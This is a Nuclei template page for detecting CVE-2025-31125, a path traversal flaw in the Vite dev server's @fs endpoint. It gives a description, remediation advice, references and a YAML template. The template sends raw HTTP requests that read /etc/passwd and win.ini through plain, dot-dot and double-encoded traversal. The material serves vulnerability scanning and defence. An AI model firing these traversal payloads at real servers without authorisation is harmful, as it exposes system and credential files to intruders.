Skip to content
Nuclei Templates

Vite Development Server - Path Traversal

ID: CVE-2025-31125

Severity: medium

Author: martian,ritikchaddha,v2htw

Tags: cve,cve2025,vite,lfi

Description

Section titled “Description”

Path traversal vulnerability in Vite development server’s @fs endpoint allows attackers to access files outside the intended directory. When exposed to the network, attackers can exploit this via crafted URLs to access sensitive system files.

YAML Source

Section titled “YAML Source”
id: CVE-2025-31125


info:
  name: Vite Development Server - Path Traversal
  author: martian,ritikchaddha,v2htw
  severity: medium
  description: |
    Path traversal vulnerability in Vite development server's @fs endpoint allows attackers to access files outside the intended directory. When exposed to the network, attackers can exploit this via crafted URLs to access sensitive system files.
  remediation: |
    Upgrade to the patched version or avoid exposing the Vite development server to the network (do not use --host flag or configure server.host); if upgrading is not immediately possible, implement access restrictions to the Vite development server
  reference:
    - https://github.com/vitejs/vite/issues/8498
    - https://github.com/vitejs/vite/pull/8804
    - https://github.com/vitejs/vite/pull/8979
    - https://nvd.nist.gov/vuln/detail/CVE-2025-31125
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2025-31125
    cwe-id: CWE-200
  metadata:
    verified: true
    max-requests: 4
    shodan-query: title:"Vite App"
    fofa-query: title="Vite App"
  tags: cve,cve2025,vite,lfi


http:
  - raw:
      - |
        GET /@fs/C:/windows/win.ini?import&?inline=1.wasm?init HTTP/1.1
        Host: {{Hostname}}


      - |
        GET /@fs/etc/passwd?import&?inline=1.wasm?init HTTP/1.1
        Host: {{Hostname}}


      - |
        GET /@fs/../../../../../../../etc/passwd?import&?inline=1.wasm?init HTTP/1.1
        Host: {{Hostname}}


      - |
        GET /@fs/%252e%252e/%252e%252e/%252e%252e/etc/passwd?import&?inline=1.wasm?init HTTP/1.1
        Host: {{Hostname}}


    stop-at-first-match: true


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "data:application/octet-stream"
          - "base64"
          - "import init"
        condition: and


      - type: word
        part: header
        words:
          - "text/javascript"
# digest: 4a0a00473045022100f2c60603d9e1f1cf0d676921d46f5339162574eaa0bbfe65c61e11ab58bd19d50220036ecb64ccdbdf0f4fd3df72594d401f02d0a00cd6ce0a1670906e5c12b5b6b9:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2025/CVE-2025-31125.yaml"

View on Github